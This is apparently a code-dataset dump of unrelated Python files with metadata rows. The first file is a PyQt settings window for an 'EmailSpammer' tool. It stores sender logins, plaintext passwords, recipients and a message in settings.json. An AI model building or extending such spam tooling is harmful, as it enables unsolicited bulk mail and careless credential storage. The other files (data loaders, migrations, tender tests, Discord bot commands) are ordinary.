brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(36, 36, 36))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.lineEdit_4.setPalette(palette)
font = QtGui.QFont()
font.setFamily("MS Shell Dlg 2")
self.lineEdit_4.setFont(font)
self.lineEdit_4.setText("")
self.lineEdit_4.setObjectName("lineEdit_4")
self.pushButton = QtWidgets.QPushButton(self.centralwidget)
self.pushButton.setGeometry(QtCore.QRect(180, 210, 111, 23))
self.pushButton.setObjectName("pushButton")
self.pushButton.clicked.connect(self.button_func)
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def clickBox(self, state):
if state == QtCore.Qt.Checked:
self.lineEdit_2.setEchoMode(QtWidgets.QLineEdit.Normal)
else:
self.lineEdit_2.setEchoMode(QtWidgets.QLineEdit.Password)
def button_func(self):
data = {
'username': self.lineEdit.text().split(', '),
'password': self.lineEdit_2.text().split(', '),
'recipient': self.lineEdit_3.text().split(', '),
'message': self.lineEdit_4.text()
}
with open('settings.json', 'w') as f:
f.write(json.dumps(data, indent=4))
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "EmailSpammer Settings"))
self.lineEdit.setPlaceholderText(_translate("MainWindow", "Sender(s)"))
self.label.setText(_translate("MainWindow", "EmailSpammer Settings"))
self.label_2.setText(_translate("MainWindow", "*If you have multiple entries, separate them with a comma"))
self.lineEdit_2.setPlaceholderText(_translate("MainWindow", "Password(s)"))
self.checkBox.setText(_translate("MainWindow", "Visible"))
self.lineEdit_3.setPlaceholderText(_translate("MainWindow", "Recipient(s)"))
self.lineEdit_4.setPlaceholderText(_translate("MainWindow", "Message"))
self.pushButton.setText(_translate("MainWindow", "Update Settings"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| 55.455331 | 116 | 0.676766 | 2,201 | 19,243 | 5.89005 | 0.086779 | 0.153425 | 0.088861 | 0.116631 | 0.80415 | 0.797516 | 0.77345 | 0.762342 | 0.759256 | 0.756788 | 0 | 0.045265 | 0.202099 | 19,243 | 346 | 117 | 55.615607 | 0.799075 | 0.014811 | 0 | 0.716923 | 1 | 0 | 0.024995 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012308 | false | 0.012308 | 0.009231 | 0 | 0.024615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
bbce9cf4438215156827b41db09cbc84cfd476d1 | 2,151 | py | Python | image.py | xuweigogogo/DSACA | 7b7de22bd770c3cc2856fcb6dc58ff07cd2a3571 | [
"MIT"
] | 8 | 2021-04-12T08:54:48.000Z | 2022-03-14T06:27:12.000Z | image.py | xuweigogogo/DSACA | 7b7de22bd770c3cc2856fcb6dc58ff07cd2a3571 | [
"MIT"
] | null | null | null | image.py | xuweigogogo/DSACA | 7b7de22bd770c3cc2856fcb6dc58ff07cd2a3571 | [
"MIT"
] | null | null | null | import h5py
import numpy as np
from PIL import Image
import cv2


def _load_data(img_path, img_ext, num_classes, train=True):
    """Load an RGB image plus its ground-truth density map and mask.

    The .h5 file is expected alongside the image, with 'images' replaced by
    'gt_density_map' in the path. Transient IO errors are retried.
    """
    gt_path = img_path.replace(img_ext, '.h5').replace('images', 'gt_density_map')
    while True:
        try:
            img = Image.open(img_path).convert('RGB')
            with h5py.File(gt_path, 'r') as gt_file:
                # Keep only the first num_classes category channels.
                target = np.asarray(gt_file['density_map'][()][0:num_classes, :, :])
                mask = np.asarray(gt_file['mask'][()][0:num_classes, :, :])
            break
        except IOError:
            cv2.waitKey(5)

    img = img.copy()
    target = target.copy()
    mask = mask.copy()
    # Binarise the mask: values <= 4 are kept (1), larger values are masked out (0).
    mask[mask <= 4] = 1
    mask[mask > 4] = 0
    k = 0
    return img, target, k, mask


def load_data_visdrone_class_8(img_path, train=True):
    # VisDrone: .jpg images, first 8 object-category channels.
    return _load_data(img_path, '.jpg', 8, train)


def load_data_dota_class_2(img_path, train=True):
    # DOTA: .png images, first 2 object-category channels.
    return _load_data(img_path, '.png', 2, train)
| 28.68 | 88 | 0.53417 | 280 | 2,151 | 3.860714 | 0.217857 | 0.055504 | 0.066605 | 0.111008 | 0.880666 | 0.880666 | 0.880666 | 0.836263 | 0.836263 | 0.836263 | 0 | 0.030075 | 0.319851 | 2,151 | 74 | 89 | 29.067568 | 0.708818 | 0.105532 | 0 | 0.730769 | 0 | 0 | 0.048833 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.115385 | 0 | 0.192308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a52d6499cfd9aad044569c36fe148fb4f7dcf117 | 101 | py | Python | examples/supervised/neuralnets+svm/datasets/__init__.py | sveilleux1/pybrain | 1e1de73142c290edb84e29ca7850835f3e7bca8b | [
"BSD-3-Clause"
] | 2,208 | 2015-01-02T02:14:41.000Z | 2022-03-31T04:45:46.000Z | examples/supervised/neuralnets+svm/datasets/__init__.py | sveilleux1/pybrain | 1e1de73142c290edb84e29ca7850835f3e7bca8b | [
"BSD-3-Clause"
] | 91 | 2015-01-08T16:42:16.000Z | 2021-12-11T19:16:35.000Z | examples/supervised/neuralnets+svm/datasets/__init__.py | sveilleux1/pybrain | 1e1de73142c290edb84e29ca7850835f3e7bca8b | [
"BSD-3-Clause"
] | 786 | 2015-01-02T15:18:20.000Z | 2022-02-23T23:42:40.000Z | from .datagenerator import generateNoisySines, generateGridData, generateClassificationData, plotData | 101 | 101 | 0.90099 | 7 | 101 | 13 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059406 | 101 | 1 | 101 | 101 | 0.957895 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
3c000b72b1c05ad2099080d37d73975ff58b2587 | 49 | py | Python | data_sets/__init__.py | OptimusPrimus/dcase2019_task1b | 321e10affd47ccecc9dd4d2d327e466481f457c9 | [
"MIT"
] | 8 | 2019-06-30T10:05:33.000Z | 2022-01-09T20:40:05.000Z | data_sets/__init__.py | OptimusPrimus/dcase2019_task1b | 321e10affd47ccecc9dd4d2d327e466481f457c9 | [
"MIT"
] | null | null | null | data_sets/__init__.py | OptimusPrimus/dcase2019_task1b | 321e10affd47ccecc9dd4d2d327e466481f457c9 | [
"MIT"
] | 3 | 2019-11-06T19:06:53.000Z | 2020-06-09T16:01:50.000Z | from data_sets.dcase20191b import SpecDCASE20191b | 49 | 49 | 0.918367 | 6 | 49 | 7.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.217391 | 0.061224 | 49 | 1 | 49 | 49 | 0.73913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3c77f9fc6fecb86ec19822b319be75f0e266e35f | 1,959 | py | Python | aether/forum/migrations/0007_auto_20210616_2216.py | katajakasa/aetherguild4 | a7e294f0cff11e2508751f1013e6648fdc56bb94 | [
"MIT"
] | null | null | null | aether/forum/migrations/0007_auto_20210616_2216.py | katajakasa/aetherguild4 | a7e294f0cff11e2508751f1013e6648fdc56bb94 | [
"MIT"
] | 1 | 2021-06-10T17:36:11.000Z | 2021-06-10T17:36:11.000Z | aether/forum/migrations/0007_auto_20210616_2216.py | katajakasa/aetherguild4 | a7e294f0cff11e2508751f1013e6648fdc56bb94 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.4 on 2021-06-16 19:16
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('forum', '0006_forumpost_attached_gallery'),
]
operations = [
migrations.AlterField(
model_name='bbcodeimage',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='forumboard',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='forumlastread',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='forumpost',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='forumpostedit',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='forumsection',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='forumthread',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='forumuser',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| 36.277778 | 111 | 0.607963 | 197 | 1,959 | 5.86802 | 0.233503 | 0.083045 | 0.17301 | 0.200692 | 0.763841 | 0.763841 | 0.763841 | 0.763841 | 0.763841 | 0.763841 | 0 | 0.013333 | 0.272588 | 1,959 | 53 | 112 | 36.962264 | 0.797895 | 0.022971 | 0 | 0.680851 | 1 | 0 | 0.08159 | 0.016213 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021277 | 0 | 0.085106 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b1b96f903eb59e2d73af945bc612aac2cfb887de | 349 | py | Python | preprocess_main.py | RayonSL/Competition | eafc914f3cc0af394cfc1aed0769a1afac044680 | [
"Apache-2.0"
] | 2 | 2019-10-31T02:15:09.000Z | 2020-01-14T10:41:04.000Z | preprocess_main.py | RayonSL/Competition | eafc914f3cc0af394cfc1aed0769a1afac044680 | [
"Apache-2.0"
] | null | null | null | preprocess_main.py | RayonSL/Competition | eafc914f3cc0af394cfc1aed0769a1afac044680 | [
"Apache-2.0"
] | null | null | null | # from preprocess import extract_image_and_label
# from preprocess import train_val_split
# from preprocess import generate_test_a
# from preprocess import generate_round1_normal
# from preprocess import merge_train_with_round1_normal
from preprocess import generate_round1_full_train
from preprocess import merge_train_with_round1_normal_full_train | 49.857143 | 64 | 0.893983 | 50 | 349 | 5.8 | 0.36 | 0.337931 | 0.482759 | 0.289655 | 0.572414 | 0.317241 | 0.317241 | 0.317241 | 0 | 0 | 0 | 0.012618 | 0.091691 | 349 | 7 | 64 | 49.857143 | 0.902208 | 0.641834 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
5903871c8539aa25127c2cad257d066fc9a4ac7e | 12,338 | py | Python | src/openprocurement/tender/openua/tests/cancellation_blanks.py | scrubele/prozorro-testing | 42b93ea2f25d8cc40e66c596f582c7c05e2a9d76 | [
"Apache-2.0"
] | null | null | null | src/openprocurement/tender/openua/tests/cancellation_blanks.py | scrubele/prozorro-testing | 42b93ea2f25d8cc40e66c596f582c7c05e2a9d76 | [
"Apache-2.0"
] | 2 | 2021-03-25T23:27:04.000Z | 2022-03-21T22:18:15.000Z | src/openprocurement/tender/openua/tests/cancellation_blanks.py | scrubele/prozorro-testing | 42b93ea2f25d8cc40e66c596f582c7c05e2a9d76 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# TenderCancellationResourceTest
import mock
from datetime import timedelta
from openprocurement.api.utils import get_now
@mock.patch(
"openprocurement.tender.core.models.RELEASE_2020_04_19",
get_now() + timedelta(days=1)
)
def create_tender_cancellation(self):
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{"data": {"reason": "cancellation reason"}},
)
self.assertEqual(response.status, "201 Created")
self.assertEqual(response.content_type, "application/json")
cancellation = response.json["data"]
self.assertIn("date", cancellation)
self.assertEqual(cancellation["reasonType"], "cancelled")
self.assertEqual(cancellation["reason"], "cancellation reason")
self.assertIn("id", cancellation)
self.assertIn(cancellation["id"], response.headers["Location"])
response = self.app.get("/tenders/{}".format(self.tender_id))
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["data"]["status"], "active.tendering")
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{"data": {"reason": "cancellation reason", "reasonType": "unFixable"}},
status=422
)
self.assertEqual(response.status, "422 Unprocessable Entity")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(
response.json["errors"],
[
{
u"description": [u"Value must be one of %s" % ["cancelled", "unsuccessful"]],
u"location": u"body",
u"name": u"reasonType",
}
],
)
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{"data": {"reason": "cancellation reason", "status": "active", "reasonType": "unsuccessful"}},
)
self.assertEqual(response.status, "201 Created")
self.assertEqual(response.content_type, "application/json")
cancellation = response.json["data"]
self.assertEqual(cancellation["reasonType"], "unsuccessful")
self.assertEqual(cancellation["reason"], "cancellation reason")
self.assertEqual(cancellation["status"], "active")
self.assertIn("id", cancellation)
self.assertIn(cancellation["id"], response.headers["Location"])
response = self.app.get("/tenders/{}".format(self.tender_id))
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["data"]["status"], "cancelled")
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{"data": {"reason": "cancellation reason"}},
status=403,
)
self.assertEqual(response.status, "403 Forbidden")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(
response.json["errors"][0]["description"], "Can't update tender in current (cancelled) status"
)
@mock.patch(
"openprocurement.tender.core.models.RELEASE_2020_04_19",
get_now() + timedelta(days=1)
)
def patch_tender_cancellation(self):
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{"data": {"reason": "cancellation reason"}},
)
self.assertEqual(response.status, "201 Created")
self.assertEqual(response.content_type, "application/json")
cancellation = response.json["data"]
old_date_status = response.json["data"]["date"]
response = self.app.patch_json(
"/tenders/{}/cancellations/{}?acc_token={}".format(self.tender_id, cancellation["id"], self.tender_token),
{"data": {"reasonType": "unsuccessful"}},
)
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["data"]["reasonType"], "unsuccessful")
response = self.app.patch_json(
"/tenders/{}/cancellations/{}?acc_token={}".format(self.tender_id, cancellation["id"], self.tender_token),
{"data": {"status": "active"}},
)
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["data"]["status"], "active")
self.assertNotEqual(old_date_status, response.json["data"]["date"])
response = self.app.get("/tenders/{}".format(self.tender_id))
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["data"]["status"], "cancelled")
response = self.app.patch_json(
"/tenders/{}/cancellations/{}?acc_token={}".format(self.tender_id, cancellation["id"], self.tender_token),
{"data": {"status": "pending"}},
status=403,
)
self.assertEqual(response.status, "403 Forbidden")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(
response.json["errors"][0]["description"], "Can't update tender in current (cancelled) status"
)
response = self.app.patch_json(
"/tenders/{}/cancellations/some_id?acc_token={}".format(self.tender_id, self.tender_token),
{"data": {"status": "active"}},
status=404,
)
self.assertEqual(response.status, "404 Not Found")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["status"], "error")
self.assertEqual(
response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"cancellation_id"}]
)
response = self.app.patch_json("/tenders/some_id/cancellations/some_id", {"data": {"status": "active"}}, status=404)
self.assertEqual(response.status, "404 Not Found")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["status"], "error")
self.assertEqual(
response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"tender_id"}]
)
response = self.app.get("/tenders/{}/cancellations/{}".format(self.tender_id, cancellation["id"]))
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["data"]["status"], "active")
self.assertEqual(response.json["data"]["reason"], "cancellation reason")
# TenderAwardsCancellationResourceTest
@mock.patch(
"openprocurement.tender.core.models.RELEASE_2020_04_19",
get_now() + timedelta(days=1)
)
def cancellation_active_award(self):
self.app.authorization = ("Basic", ("auction", ""))
response = self.app.get("/tenders/{}/auction".format(self.tender_id))
auction_bids_data = response.json["data"]["bids"]
for i in self.initial_lots:
response = self.app.post_json(
"/tenders/{}/auction/{}".format(self.tender_id, i["id"]), {"data": {"bids": auction_bids_data}}
)
self.app.authorization = ("Basic", ("token", ""))
response = self.app.get("/tenders/{}/awards".format(self.tender_id))
award_id = [
i["id"] for i in response.json["data"] if i["status"] == "pending" and i["lotID"] == self.initial_lots[0]["id"]
][0]
response = self.app.patch_json(
"/tenders/{}/awards/{}?acc_token={}".format(self.tender_id, award_id, self.tender_token),
{"data": {"status": "active", "qualified": True, "eligible": True}},
)
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{
"data": {
"reason": "cancellation reason",
"status": "active",
"cancellationOf": "lot",
"relatedLot": self.initial_lots[0]["id"],
}
},
)
self.assertEqual(response.status, "201 Created")
self.assertEqual(response.content_type, "application/json")
cancellation = response.json["data"]
self.assertEqual(cancellation["reason"], "cancellation reason")
self.assertEqual(cancellation["status"], "active")
self.assertIn("id", cancellation)
self.assertIn(cancellation["id"], response.headers["Location"])
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{"data": {"reason": "cancellation reason", "status": "active"}},
)
self.assertEqual(response.status, "201 Created")
self.assertEqual(response.content_type, "application/json")
cancellation = response.json["data"]
self.assertEqual(cancellation["reason"], "cancellation reason")
self.assertEqual(cancellation["status"], "active")
self.assertIn("id", cancellation)
self.assertIn(cancellation["id"], response.headers["Location"])
@mock.patch(
"openprocurement.tender.core.models.RELEASE_2020_04_19",
get_now() + timedelta(days=1)
)
def cancellation_unsuccessful_award(self):
self.app.authorization = ("Basic", ("auction", ""))
response = self.app.get("/tenders/{}/auction".format(self.tender_id))
auction_bids_data = response.json["data"]["bids"]
for i in self.initial_lots:
response = self.app.post_json(
"/tenders/{}/auction/{}".format(self.tender_id, i["id"]), {"data": {"bids": auction_bids_data}}
)
self.app.authorization = ("Basic", ("token", ""))
response = self.app.get("/tenders/{}/awards".format(self.tender_id))
award_id = [
i["id"] for i in response.json["data"] if i["status"] == "pending" and i["lotID"] == self.initial_lots[0]["id"]
][0]
response = self.app.patch_json(
"/tenders/{}/awards/{}?acc_token={}".format(self.tender_id, award_id, self.tender_token),
{"data": {"status": "unsuccessful"}},
)
response = self.app.get("/tenders/{}/awards".format(self.tender_id))
award_id = [
i["id"] for i in response.json["data"] if i["status"] == "pending" and i["lotID"] == self.initial_lots[0]["id"]
][0]
response = self.app.patch_json(
"/tenders/{}/awards/{}?acc_token={}".format(self.tender_id, award_id, self.tender_token),
{"data": {"status": "unsuccessful"}},
)
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{
"data": {
"reason": "cancellation reason",
"status": "active",
"cancellationOf": "lot",
"relatedLot": self.initial_lots[0]["id"],
}
},
status=403,
)
self.assertEqual(response.status, "403 Forbidden")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["errors"][0]["description"],
"Can't perform cancellation if all awards are unsuccessful")
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{"data": {"reason": "cancellation reason", "status": "active"}},
status=403,
)
self.assertEqual(response.status, "403 Forbidden")
self.assertEqual(response.content_type, "application/json")
self.assertEqual(response.json["errors"][0]["description"],
"Can't perform cancellation if all awards are unsuccessful")
response = self.app.post_json(
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token),
{
"data": {
"reason": "cancellation reason",
"status": "active",
"cancellationOf": "lot",
"relatedLot": self.initial_lots[1]["id"],
}
},
)
self.assertEqual(response.status, "201 Created")
self.assertEqual(response.content_type, "application/json")
cancellation = response.json["data"]
self.assertEqual(cancellation["reason"], "cancellation reason")
self.assertEqual(cancellation["status"], "active")
self.assertIn("id", cancellation)
self.assertIn(cancellation["id"], response.headers["Location"])
| 42.544828 | 120 | 0.647836 | 1,353 | 12,338 | 5.791574 | 0.083518 | 0.124426 | 0.158499 | 0.064319 | 0.924962 | 0.92075 | 0.908754 | 0.891271 | 0.889612 | 0.889612 | 0 | 0.012608 | 0.177176 | 12,338 | 289 | 121 | 42.692042 | 0.759259 | 0.007213 | 0 | 0.708661 | 0 | 0 | 0.277174 | 0.079461 | 0 | 0 | 0 | 0 | 0.30315 | 1 | 0.015748 | false | 0 | 0.011811 | 0 | 0.027559 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
593bcc3574fcbe5a25a726cc6e8190a9b7246ca4 | 3,372 | py | Python | commands/admincmds.py | DwarflinDeveloping/Linker | d97161b2fd202dc6189482b344846e9377aee4a1 | [
"MIT"
] | 1 | 2021-03-24T12:28:12.000Z | 2021-03-24T12:28:12.000Z | commands/admincmds.py | DwarflinDeveloping/Linker | d97161b2fd202dc6189482b344846e9377aee4a1 | [
"MIT"
] | 5 | 2021-03-26T15:05:30.000Z | 2022-02-05T18:21:23.000Z | commands/admincmds.py | DwarflinDeveloping/Linker | d97161b2fd202dc6189482b344846e9377aee4a1 | [
"MIT"
] | 3 | 2021-03-26T15:06:58.000Z | 2022-02-05T19:00:16.000Z | administrators = [784473264755834880]
operators = [784473264755834880]
paused = False
async def pause(ctx, client):
from embeds import create_custom_embed
from discord import Colour
if ctx.author.id != 784473264755834880:
embed = create_custom_embed(
embed_message="You are not permitted to pause the bot!",
user=ctx.author,
colour=Colour.dark_red()
)
await ctx.send(embed=embed)
return
global paused
if paused:
await ctx.send(
embed=create_custom_embed(
embed_message="I am no longer paused.",
user=ctx.author,
colour=Colour.dark_green()
)
)
paused = False
return
confirmation_message = await ctx.send(
embed=create_custom_embed(
embed_title="Confirmation",
embed_message="You're about to pause me. Do you really want to continue this process?",
user=ctx.author,
colour=Colour.blue()
)
)
from utils import ReturnCodes, get_confirmation
confirmation = await get_confirmation(confirmation_message, ctx.author, client)
if confirmation == ReturnCodes.SUCCESS:
await ctx.send(
embed=create_custom_embed(
embed_message="I paused. Until you repeat this command, I will not answer any requests.",
user=ctx.author,
colour=Colour.dark_green()
)
)
paused = True
elif confirmation == ReturnCodes.CANCELLED:
await confirmation_message.delete()
elif confirmation == ReturnCodes.TIMEOUT_ERROR:
await confirmation_message.delete()
elif confirmation == ReturnCodes.OTHER_ERROR:
from embeds import handle_error
await ctx.send(handle_error(confirmation, ctx.author))
async def shutdown(ctx, client):
from embeds import create_custom_embed
from discord import Colour
if ctx.author.id != 784473264755834880:
embed = create_custom_embed(
embed_message="You are not permitted to close the bot!",
user=ctx.author,
colour=Colour.dark_red()
)
await ctx.send(embed=embed)
return
confirmation_message = await ctx.send(
embed=create_custom_embed(
embed_title="Confirmation",
embed_message="You're about to shut me down. Do you really want to continue this process?",
user=ctx.author,
colour=Colour.blue()
)
)
from utils import ReturnCodes, get_confirmation
confirmation = await get_confirmation(confirmation_message, ctx.author, client)
if confirmation == ReturnCodes.SUCCESS:
await ctx.send(
embed=create_custom_embed(
embed_message="I am shutting down. Check the console for possible errors.",
user=ctx.author,
colour=Colour.dark_green()
)
)
await client.close()
elif confirmation == ReturnCodes.CANCELLED:
await confirmation_message.delete()
elif confirmation == ReturnCodes.TIMEOUT_ERROR:
await confirmation_message.delete()
elif confirmation == ReturnCodes.OTHER_ERROR:
from embeds import handle_error
await ctx.send(handle_error(confirmation, ctx.author))
| 33.058824 | 105 | 0.631376 | 366 | 3,372 | 5.674863 | 0.229508 | 0.056331 | 0.073664 | 0.074145 | 0.864227 | 0.864227 | 0.864227 | 0.847857 | 0.80934 | 0.80934 | 0 | 0.030278 | 0.294781 | 3,372 | 101 | 106 | 33.386139 | 0.843146 | 0 | 0 | 0.715909 | 0 | 0 | 0.119514 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a71aea54d1f6cdc8f602a580003229dfda0b53f1 | 169 | py | Python | settings/__init__.py | satdav/mozillians | 97d764f68d930275c1d722ba21c40ec2a963491d | [
"BSD-3-Clause"
] | null | null | null | settings/__init__.py | satdav/mozillians | 97d764f68d930275c1d722ba21c40ec2a963491d | [
"BSD-3-Clause"
] | null | null | null | settings/__init__.py | satdav/mozillians | 97d764f68d930275c1d722ba21c40ec2a963491d | [
"BSD-3-Clause"
] | null | null | null | from funfactory.settings_base import *
from settings.initial import *
from settings.default import *
try:
from settings.local import *
except ImportError:
pass
| 18.777778 | 38 | 0.769231 | 21 | 169 | 6.142857 | 0.571429 | 0.27907 | 0.27907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171598 | 169 | 8 | 39 | 21.125 | 0.921429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.142857 | 0.714286 | 0 | 0.714286 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 8 |
a71d20418aba98291168553902e547019802c4d4 | 16,120 | py | Python | src/abaqus/XY/AxisData.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
